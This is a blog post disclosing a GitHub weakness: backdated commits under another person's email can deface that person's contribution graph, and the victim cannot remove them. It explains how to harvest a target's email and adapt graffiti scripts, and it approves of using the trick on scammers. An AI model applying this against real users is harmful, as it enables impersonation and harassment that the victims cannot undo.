GitHub Graffiti
For years open source projects let you to "Decorate" your contribution graph with fake commit Git histories.
But did you know you can graffiti OTHER PEOPLE's GitHub activity? Take for example the banner below I stuck on a few spammer/phisher's GitHub profiles.
Here's how.
You may know that you can paint funny pixel art on your GitHub activity graph with a simple script, by taking advantage of the fact Git commits can be backdated, and there's no timestamp validation mechanism between Git and GitHub:
There's very strange validation between Git commit emails and GitHub username emails.
You may think there's no validation, but take a look at the documentation bellow to see how attribution is done:
This means in order to plaster over someone else's commit graph we need to meet the following conditions:
They must have opened an issue (or push code) on a repository you can push to (or get a PR merged on)
You must know the email they used to register
The repository must not be a fork
It’s ripe for abuse.
This allows a ton of people to essentially plaster any 7x52 pixel billboard on other user’s without their permission. To make matters worse, as a victim you can’t remove those commits. That’s not great…
How to use this power for good.
There’s been recent phishing attempts leveraging GitHub issues to send victim’s emails.
Additionally there's been many cases of GitHub users merging malicious code to repos they don't own, such as the infamous XZ backdoor:
Wouldn't it be great if we could put some kind of warning on these user's profiles, to alert others? You can probably see where this is going.
Once the fraudster/scammer/hacker in question opens up an issue or submits a PR to us, this creates a unique opportunity: We now qualify for one of the above criteria for being able to paint their activity feed to warn others.
Indeed it did not take long before I had a fraudster opening up a GitHub issue on a repo I had push access to; allowing me to set the trap (the user has since been banned from GitHub)
If you'd like to try this for yourself, all you need to do is take one of the existing contributor graph Grafiti projects (such as this one) and modify it to use the email of your scammer. These emails are often obtainable by reviewing the events API of the spammer, or by simply cloning their repos and viewing the emails used in their old commits.
What have we learned here?
It's certainly easy to imagine someone abusing this system for less noble intentions; you could drop curse words, or worse on innocent GitHub user's profiles. These problems could be fixed if the graph was based off of push events, instead of raw commit data; however this may upset some users that may push many day's worth of commits in one go.
In any case, this lives right on the edge of a weak authentication mechanism inside of Git itself, and GitHub stapling an RBAC system around Git.
